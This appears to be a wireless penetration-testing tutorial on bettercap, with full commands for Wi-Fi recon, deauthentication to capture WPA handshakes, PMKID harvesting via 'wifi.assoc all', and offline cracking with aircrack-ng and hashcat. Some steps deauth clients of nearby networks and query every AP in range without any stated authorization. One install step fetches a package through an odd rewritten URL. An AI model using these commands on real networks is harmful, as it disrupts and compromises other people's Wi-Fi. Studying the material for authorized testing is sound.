Wireless

Penetration
Testing
Bettercap
Contents
Introduction ........................................................................................... 3
Installation ............................................................................................. 3
Monitor Mode and Wi-Fi discovery ....................................................... 6
Sorting filters .......................................................................................... 6
Deauth attacks using Bettercap ............................................................. 9
PMKID Attack using Bettercap ............................................................. 12

Page 2 of 15
Introduction
According to its official repository here, bettercap is a powerful, easily extensible, and portable framework
written in Go that aims to offer to security researchers, red teamers, and reverse engineers an easy to
use, all-in-one solution with all the features they might possibly need for performing reconnaissance and
attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks

Installation
To install bettercap, we’d use:

apt install bettercap

After getting installed, we can see the main menu by typing in:

bettercap

Page 3 of 15
Now to navigate your way around this tool for all the Wi-Fi testing related options, the help page is
available at

help wifi

Page 4 of 15
Now, this tool requires an older version of the pcap library so, we’ll first download that using wget.

wget http://old.kali.org/kali/pool/main/libp/libpcap/libpcap0.8_1.9.1-4_amd64.deb
dpkg -i libpcap0.8_1.9.1-4_amd64.deb

Page 5 of 15
Monitor Mode and Wi-Fi discovery
Monitor mode is a promiscuous mode for your IEEE802.11x receiver (aka Wi-Fi adapter or Wi-Fi NIC) and
lets you capture signals from not only your access point but others as well. To put your Wi-Fi adapter in
promiscuous mode:

bettercap -iface wlan0mon

To start discovering Access Points around you:

wifi.recon on

Sorting filters
Often knowing the vendor of an access point aids us in checking access points against known
vulnerabilities. To do this we can use the following command:

set wifi.show.manufacturer true

wifi.show

Page 6 of 15
As you can see we are now able to see a majority of the manufacturers of access points around me.
Now, what if I want to see the access points in descending order of the clients connected to it. As we
already know that deauth attacks work on APs with clients to capture a handshake and hence, having
more clients catalyses the capture process. So, for that we have:

set.wifi.show.sort clients desc

wifi.show

Page 7 of 15
As you can see the APs have arranged themselves in descending order of several clients connected.
Let’s do the same with ESSID too and arrange it in ascending order.

set.wifi.show.sort essid asc

wifi.show

Here, you can see hidden SSIDs popping up too. The angular bracket is taken into consideration before A-
Z as it is a special symbol.
Now, what if we want to limit the results to only, let’s say, the top 3? To do this:

Page 8 of 15
 set wifi.show.limit 3
wifi.show

And we’ve limited the result to only the top 3. Now, let’s send de-authentication packets to open
networks. Open networks are those which aren’t protected by a passphrase.

set wifi.deauth.open true

Here, we can see that clients from 2 APs have been de-authenticated.

Deauth attacks using Bettercap

We have already seen how to recon, sort and filter. Let’s conduct a short deauth attack on an access point.
First, put your wifi adapter in monitor mode.

bettercap -iface wlan0mon

Page 9 of 15
Now, we’ll first put up the list of APs found:

events.stream off
wifi.show

events.stream is a logging feature in bettercap that shows logs, new hosts being found, etc. By default, it
is enabled but to give a clear output we can turn it off.
Now, we’ll attack AP “raaj.”

set wifi.recon.channel 5
set net.sniff.verbose true
set net.sniff.filter ether proto 0*888e
set net.sniff.output wifi.pcap
set net.sniff on
wifi.deauth 18:45:93:69:a5:19
events.stream on

Page 10 of 15
It is operating on channel 5 and we’d first put our adapter to listen on channel 5.
By setting sniff.verbose to true, every captured and parsed packet will be sent to the events.stream for
displaying.
Next, the net.sniff.filter ether proto 0*888e sets the sniffer to capture EAPOL frames. 0*888e is the
standard code for EAPOL (IEEE 802.11X frames).
The output file is set to wifi.pcap
net.sniff on turns the bettercap sniffer on
wifi.deauth starts sending deauth packets to the specified MAC ID (BSSID) of the access point
events.stream turns the logging on and now bettercap will run in verbose mode.

As you can see, the client has reauthenticated after being deauthenticated by bettercap and a handshake
has been captured
Now, we’ll use aircrack-ng to crack hashes captured in this handshake file. We’ve already written an article
on aircrack-ng for your reference here.

aircrack-ng bettercap-wifi-handshakes.pcap -w /root/dict.txt

Here, dict.txt is a long password file containing the most commonly used passwords and passwords I
generated given the knowledge I have about my target.

Page 11 of 15
And just like that, we have cracked the Wi-Fi passphrase of “raaj.”

PMKID Attack using Bettercap

We’ve discussed in detail PMKID and PMKID attacks in this article here. Now, let’s see a small tutorial
where a bettercap can be used to conduct PMKID attacks.

bettercap
set wifi.interface wlan0mon
wifi.recon on

Page 12 of 15
Let’s see the target APs available

wifi.show

For the PMKID attack to work we have to send an association request to the target Access Point. We do
this with:

wifi.assoc <BSSID>

Page 13 of 15
As we can see, we have successfully received the RSN frame containing PMKID and it has been saved in a
pcap format. What is I want to send an association request to all the Wi-Fis available? To do that the
command is:

wifi.assoc all

And yes, all the vulnerable routers returned the RSN frame containing PMKID and it got saved in a pcap
file.
Now we can use the hcxpcaptool to convert this pcap file in Hashcat crackable format and use Hashcat
to crack the PMK hash.

hcxpcaptool -z hashpmkid bettercap-wifi-handshakes.pcap

hashcat -m 16800 --force hashpmkid /usr/share/wordlists/rockyou.txt --show

Here, 16800 is the code for PMKID WPA/WPA2 hash type. We have used the rockyou dictionary here.

Page 14 of 15
And it’s so simple. Bettercap is a sniffer with many other such functionalities besides Wi-Fi packet sniffing.

********

Page 15 of 15